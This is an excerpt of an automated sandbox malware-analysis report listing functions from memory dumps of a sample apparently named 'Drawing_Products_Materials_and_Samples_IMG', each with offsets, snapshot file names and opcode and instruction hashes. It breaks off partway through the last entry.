                                                                                      • Opcode Fuzzy Hash: 23dda4f1fd9234830420151c96e92cbf035a76bec776124ad72110d9539325f9
                                                                                      • Instruction Fuzzy Hash: 0981B374E412298FEB64DF29D850BEDBBB2BF89300F1080EAD409B7255DB705E818F44
                                                                                      Function 37369908 Relevance: .2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 018cd328b8476610aaf49b81b5d6dbc794cd695820197ea9b55fdc0443ae6b31
                                                                                      • Instruction ID: f6bb9ce73b4fb1ee3ce482549553151f652ca2408d68aa64d4ba5d2b4ed4927d
                                                                                      • Opcode Fuzzy Hash: 018cd328b8476610aaf49b81b5d6dbc794cd695820197ea9b55fdc0443ae6b31
                                                                                      • Instruction Fuzzy Hash: 8261C474E012089FEB04DFA9D984BDDBBF6AF89314F14C129E808AB359EA359901CB50
                                                                                      Function 37368A78 Relevance: .2, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 141c55b54a2886a9f8590f8e0563204fd5829dedae1a66545b857f7222287d00
                                                                                      • Instruction ID: dac93a219c8ae103f85ff24cc7308ed8b69e200129c7ca5158fdb57a67603634
                                                                                      • Opcode Fuzzy Hash: 141c55b54a2886a9f8590f8e0563204fd5829dedae1a66545b857f7222287d00
                                                                                      • Instruction Fuzzy Hash: 9C518070F002158BEB14DFB9C4A06DEBBB2AFC9740F148529E415BB384DF34AD469B95
                                                                                      Function 3741DA58 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1964fb5ee400126a0914c35a3deb880d1be988eecba35cf5689acc51f4dd6e84
                                                                                      • Instruction ID: e922b8ea98b709733ac4b56b04bdd0077583f448d13fdb54ff0702c6798eb5da
                                                                                      • Opcode Fuzzy Hash: 1964fb5ee400126a0914c35a3deb880d1be988eecba35cf5689acc51f4dd6e84
                                                                                      • Instruction Fuzzy Hash: 0F719074E002088FEB54DFA9C990AEDBBF2BF89310F248129D805BB355DB35A942CF54
                                                                                      Function 37417A28 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1e499db7fcdfb2075a924f5474859cccabe8984949a744404732fa455de754f
                                                                                      • Instruction ID: 39ba222c9fbb5d5bbf6cbf6a992e4d532a8987345e47a79d4da284bd15fec784
                                                                                      • Opcode Fuzzy Hash: f1e499db7fcdfb2075a924f5474859cccabe8984949a744404732fa455de754f
                                                                                      • Instruction Fuzzy Hash: 6071A174E002088FEB54DFA9D990AEDBBF2BF89310F248129D805BB355DB356942CF54
                                                                                      Function 374081E8 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f61a5c10b7ce38be506240c177f7f561bbeda523da4d0392428075ebb63875ea
                                                                                      • Instruction ID: e18f41281e230ed005b419d3f42c7b42015203ef55bd1ed79643c59747ad1663
                                                                                      • Opcode Fuzzy Hash: f61a5c10b7ce38be506240c177f7f561bbeda523da4d0392428075ebb63875ea
                                                                                      • Instruction Fuzzy Hash: 1771B074E002088FEB54DFA9C990ADDBBF2BF89300F648129D804BB355DB35A942DF54
                                                                                      Function 374021B8 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfeaf8c35752628f885ce0662f291c78b4ac4d4cbc3c6f8e59d0d9bdde6cd594
                                                                                      • Instruction ID: bcedf69a4a1edc5d7407fffc32bd184fc1f67eb9862f38bd7cfce544dcfdb208
                                                                                      • Opcode Fuzzy Hash: cfeaf8c35752628f885ce0662f291c78b4ac4d4cbc3c6f8e59d0d9bdde6cd594
                                                                                      • Instruction Fuzzy Hash: 7371AF74E00218CFEB54DFA9D990ADDBBB2BF89300F648129D804BB394DB35A942DF54
                                                                                      Function 001162E4 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77010b986ddc670c3eb1361778c39afbe0e461da0f98a3cf6a2f550180abe06e
                                                                                      • Instruction ID: e1a9b97779c9394dde6773fe0cb9b53951443ddb12faa0efc6bbc2b5a6419b78
                                                                                      • Opcode Fuzzy Hash: 77010b986ddc670c3eb1361778c39afbe0e461da0f98a3cf6a2f550180abe06e
                                                                                      • Instruction Fuzzy Hash: 9451CE317142559FEF198F64D854BAE7BB2FF85704F144429E886CB290CB7ACC82DB94
                                                                                      Function 3736A490 Relevance: .2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a264315f20e5826cc05ef299e3e95d5456201d795e1ec40ad86cab00b1882a75
                                                                                      • Instruction ID: c5ab2f07742fd7506672ab8bc2a7e33ffc154a6ea38598a8ce3195a22df79679
                                                                                      • Opcode Fuzzy Hash: a264315f20e5826cc05ef299e3e95d5456201d795e1ec40ad86cab00b1882a75
                                                                                      • Instruction Fuzzy Hash: B861B474E012189FDB44DFA9D894AEDBBB2FF88300F10812AE819BB355DB356946DF50
                                                                                      Function 0011FADB Relevance: .2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3318bc9eb306260c77ff9925a82582d4ee9b85798f5e51570c0eafc92656ffa9
                                                                                      • Instruction ID: 7e9cc20c8647a26c3b8dfd22fb895ec493354eea18684c245f8d8ff752ed4781
                                                                                      • Opcode Fuzzy Hash: 3318bc9eb306260c77ff9925a82582d4ee9b85798f5e51570c0eafc92656ffa9
                                                                                      • Instruction Fuzzy Hash: AB510F34E01218CFDB28DFA5D954AEDBBB2FF89301F208229D805AB294DB355A46DF40
                                                                                      Function 3741ED30 Relevance: .2, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 950f18934c843ad1269d972108333481d9842632ecbf22be15d176af1ba5e361
                                                                                      • Instruction ID: fdf088dd8cd52477e422a788eebf90d5b587708f972b727a8bf0e5131cbaf755
                                                                                      • Opcode Fuzzy Hash: 950f18934c843ad1269d972108333481d9842632ecbf22be15d176af1ba5e361
                                                                                      • Instruction Fuzzy Hash: 0551E878B14325DFD708EF28D494ABA77B5AB48326B914C54E811AB365CB35FC42CB90
                                                                                      Function 00116428 Relevance: .1, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fa7ee4fbe7a2fe9d54b6dcd3f678c0b5fb3cc4cc6d1fc561fc2056fcdb2ad43c
                                                                                      • Instruction ID: 1882a37f3d73126738f6812e6954059e49cd865e2f45fffab17ff55d55b92186
                                                                                      • Opcode Fuzzy Hash: fa7ee4fbe7a2fe9d54b6dcd3f678c0b5fb3cc4cc6d1fc561fc2056fcdb2ad43c
                                                                                      • Instruction Fuzzy Hash: 6741CE307002008FEB599F78C8A4BBEB6A6AFC9744F148539E5428B395DF398C82D795
                                                                                      Function 3736A100 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a75ee5a8285e45f74ae874b3cf4d66fb12a0af0e0b47cce861ac88980db0b357
                                                                                      • Instruction ID: cdc55e4371da3b86a17b119a5780182d82ced33c8827d07aa6b840f8d3062040
                                                                                      • Opcode Fuzzy Hash: a75ee5a8285e45f74ae874b3cf4d66fb12a0af0e0b47cce861ac88980db0b357
                                                                                      • Instruction Fuzzy Hash: DD51D6B4E012189FDB44DFA9D595AEEBBF1BF88300F10802AD415BB355DB346E45CB90
                                                                                      Function 00114518 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f3fcf0be33c5e39003ceb965fab5c0a6b53eaa1784906e466c46d8dbd36306af
                                                                                      • Instruction ID: b87b39d8eeff6b02baeddcc29bde72ee73cda7e4671d2cba3c00733c64f0d87f
                                                                                      • Opcode Fuzzy Hash: f3fcf0be33c5e39003ceb965fab5c0a6b53eaa1784906e466c46d8dbd36306af
                                                                                      • Instruction Fuzzy Hash: 4F519F74E15208CFDB48DFA9D99489DBBF2FF89700B209169E805BB364DB35A942CF50
                                                                                      Function 00114520 Relevance: .1, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 232bd98cf26b754731165eb62a56a94509b04d702e9de297372339e995755c44
                                                                                      • Instruction ID: 582e1ebf08f97b7f0d4a5cd9052fab56bda3137c4b15c924de8c9c4b72f7e1f0
                                                                                      • Opcode Fuzzy Hash: 232bd98cf26b754731165eb62a56a94509b04d702e9de297372339e995755c44
                                                                                      • Instruction Fuzzy Hash: 6251A074E11208CFDB48DFA9D98489DBBF2FF89700B609169E805BB364DB35A942CF50
                                                                                      Function 36A90C04 Relevance: .1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1da3d364daf1a10b7e428c1ebe00eef38ce0c0ce52ea427ce7c0b582a98633a
                                                                                      • Instruction ID: 9a2d8fade2d75e00e20646e5db150210e37813e6834ad0e5f89d5e97e59a6c92
                                                                                      • Opcode Fuzzy Hash: d1da3d364daf1a10b7e428c1ebe00eef38ce0c0ce52ea427ce7c0b582a98633a
                                                                                      • Instruction Fuzzy Hash: 3551AE74D01228CFDB64DF69D984ADDBBF1BB89301F2055A9D408A7350DB35AE82DF50
                                                                                      Function 3736B360 Relevance: .1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dae19715b35fe95797db6e6d99e4ab8a644079d714cd65598455ef714b41b67
                                                                                      • Instruction ID: 4cd48d6e20b6f50e1653f6e0e87f70610567bca3c88a29259880ff0d173c4c77
                                                                                      • Opcode Fuzzy Hash: 0dae19715b35fe95797db6e6d99e4ab8a644079d714cd65598455ef714b41b67
                                                                                      • Instruction Fuzzy Hash: 7851B875E00319CFDB14DFE9C484ADEBBB6BF89300F20852AD419AB254EB30A945CF50
                                                                                      Function 36A93ED8 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3aad71138c089122c03f99b98b9a697a30ca7e90271cfc10a23eb2dfc100c5ee
                                                                                      • Instruction ID: 6fcc644c54881c31949d2cb5c775e9382ea0307fa124d53f4718fdf966f3aa86
                                                                                      • Opcode Fuzzy Hash: 3aad71138c089122c03f99b98b9a697a30ca7e90271cfc10a23eb2dfc100c5ee
                                                                                      • Instruction Fuzzy Hash: D3410635A002198FDB04DB98C481EDDBBF6FF88324F255594E901AF3A1DB71EC858BA4
                                                                                      Function 0011B290 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2457e7e61e59240935a2db97e2f7f23cfd51c28c4e6664252f17e517f7cca07f
                                                                                      • Instruction ID: 74efb9027dab77732219ef1207e3e3eb6953db50efff0d5d501a7f763028185a
                                                                                      • Opcode Fuzzy Hash: 2457e7e61e59240935a2db97e2f7f23cfd51c28c4e6664252f17e517f7cca07f
                                                                                      • Instruction Fuzzy Hash: AC419035B042049FDB08AF69D8A4AAE7BB6FFC9710F158029E506DB391DF359C02CB94
                                                                                      Function 36A93EC8 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87876699193b82a9776da72ac8e2b7b3fa3e3fefc1cafafc0e57ac09f8d1a128
                                                                                      • Instruction ID: 78e0283e8198b2c4ad7faa5ebc7e38ed40029a71c795c10ff64e90b29a8cce0c
                                                                                      • Opcode Fuzzy Hash: 87876699193b82a9776da72ac8e2b7b3fa3e3fefc1cafafc0e57ac09f8d1a128
                                                                                      • Instruction Fuzzy Hash: A7412C39A002098FDB04DB98C591ADD7BF2EF88720F255554E901AF3A1DB31EC85CBA5
                                                                                      Function 37580D31 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e6d20394d92106819280b79904cede929a2c0390a19784faf699fe7ca219d89
                                                                                      • Instruction ID: 5f201613d83e131e66d02d1a8693e57dc1c8bfdcc8cc7f451443a6340cea1a2a
                                                                                      • Opcode Fuzzy Hash: 2e6d20394d92106819280b79904cede929a2c0390a19784faf699fe7ca219d89
                                                                                      • Instruction Fuzzy Hash: A541CC79E01208DFDB54CFA9D5947EDBBF1AB49310F10802AD809B7294DB74AA46CF54
                                                                                      Function 37368A69 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f4fae1efa1432be661ac9739acd9b4b475f2419210ff04be0ce656643d231b9
                                                                                      • Instruction ID: 7f0546c953c9a34677c097f00bec6755b98bdf16ff3064fff0121d41c126b905
                                                                                      • Opcode Fuzzy Hash: 2f4fae1efa1432be661ac9739acd9b4b475f2419210ff04be0ce656643d231b9
                                                                                      • Instruction Fuzzy Hash: 1B415E71E003199BDB14DFA5C884ADEFBF5EF88750F148129E415B7244EB70AD46CB90
                                                                                      Function 37580D40 Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8492cf4dd7e18730adb54b3c9a9a66a993518cd753a3399bf991343c0997b94
                                                                                      • Instruction ID: d2190c0e3f0d4d87496f60c3851462160714d2e916843007fe7b54e2d735c085
                                                                                      • Opcode Fuzzy Hash: b8492cf4dd7e18730adb54b3c9a9a66a993518cd753a3399bf991343c0997b94
                                                                                      • Instruction Fuzzy Hash: 0C41BE79E01208DFDB44CFA9D5947EDBBF2AF49310F10902AD809B7294DB78AA46CF54
                                                                                      Function 0011AE28 Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb930d0f494f7c34bed7ae5bd6058f528a7334bbc5ace656ce6c304fb3483206
                                                                                      • Instruction ID: 92b0f8e546eaf30ea2eca316c423a39cb088282c5097e424ab91131a03885bde
                                                                                      • Opcode Fuzzy Hash: fb930d0f494f7c34bed7ae5bd6058f528a7334bbc5ace656ce6c304fb3483206
                                                                                      • Instruction Fuzzy Hash: C0414C756012199FCB18DF28C848AAE7BB5FF49711F514069F915DB3A0CB71DC81CBA2
                                                                                      Function 001159E0 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 180bf1ec24534c77599319a7d57816dad081c3e5b77d76bce901c02a0716f5c2
                                                                                      • Instruction ID: c6f5a175057ace05d8674bb8d638b17014d9c891f6a3d4e17647a95337e7e2cf
                                                                                      • Opcode Fuzzy Hash: 180bf1ec24534c77599319a7d57816dad081c3e5b77d76bce901c02a0716f5c2
                                                                                      • Instruction Fuzzy Hash: 6C317E31704149EFCF099FA4D894AAE3BA6FF8A314F104029F90597295CB38DD62DB91
                                                                                      Function 36A93F59 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5d9e236f881c86be30cbc88711f52ff8b7329ef275aa0e3d12d88721d94d828
                                                                                      • Instruction ID: 56a3c317cd21dae0b94f9943a14070e944a7638c2aee25865a4c8f8b28646a1b
                                                                                      • Opcode Fuzzy Hash: d5d9e236f881c86be30cbc88711f52ff8b7329ef275aa0e3d12d88721d94d828
                                                                                      • Instruction Fuzzy Hash: 58310735B002198FDB44DBA8C491EDDBBF2EF88720F255554E901AF362DB31EC858BA4
                                                                                      Function 36A93F8D Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3affc032944914072a9bcdf85d67ea9916855c928e47e75ef8fe7c5faa2603b3
                                                                                      • Instruction ID: 64ab92e7d901373421e778cdaf599a396b74921d98081ad941db7931d023711f
                                                                                      • Opcode Fuzzy Hash: 3affc032944914072a9bcdf85d67ea9916855c928e47e75ef8fe7c5faa2603b3
                                                                                      • Instruction Fuzzy Hash: 67311835B002058FDB44DBA8C491EDD7BF6EF88720F255554E901AF362DA31EC858BA4
                                                                                      Function 3741DA48 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db16ce46f947373a2e084a5b9867df426e9fc1aa90653db508cfd977e314ef36
                                                                                      • Instruction ID: c57162139463f99dcf2b5720b8c700521a0b33c7402c40a29dd368721dff44dc
                                                                                      • Opcode Fuzzy Hash: db16ce46f947373a2e084a5b9867df426e9fc1aa90653db508cfd977e314ef36
                                                                                      • Instruction Fuzzy Hash: 1E3109B4D01208DBEB14DFAAD9506EDBBF2AF8A300F24D42AC418BB354DB345942CF55
                                                                                      Function 374081D9 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ce2f77748b892d1460485c413020cf8b97bf15d2f9e50915cacd804ffd66283
                                                                                      • Instruction ID: f9a3a385adc14abd31033c8cb040d780a09f346b9c4778930640643e0f9fde0c
                                                                                      • Opcode Fuzzy Hash: 3ce2f77748b892d1460485c413020cf8b97bf15d2f9e50915cacd804ffd66283
                                                                                      • Instruction Fuzzy Hash: F831C574D01608CBEB04DFAAC9546DEBBF6AF8A300F24953AC818BB254DB345942CF55
                                                                                      Function 374021A9 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed83ac44176726da67c973812be7585ad096000fd7020d5aa12ac5da943ee785
                                                                                      • Instruction ID: a83081a54b610a2b8e8befbb1dd774055db02bf9913cfea5978864c94f02f353
                                                                                      • Opcode Fuzzy Hash: ed83ac44176726da67c973812be7585ad096000fd7020d5aa12ac5da943ee785
                                                                                      • Instruction Fuzzy Hash: B431C374E01248CBDB44DFAAC9506DEFBF6AF8A300F24952AD818BB354DB346942CF54
                                                                                      Function 00118718 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
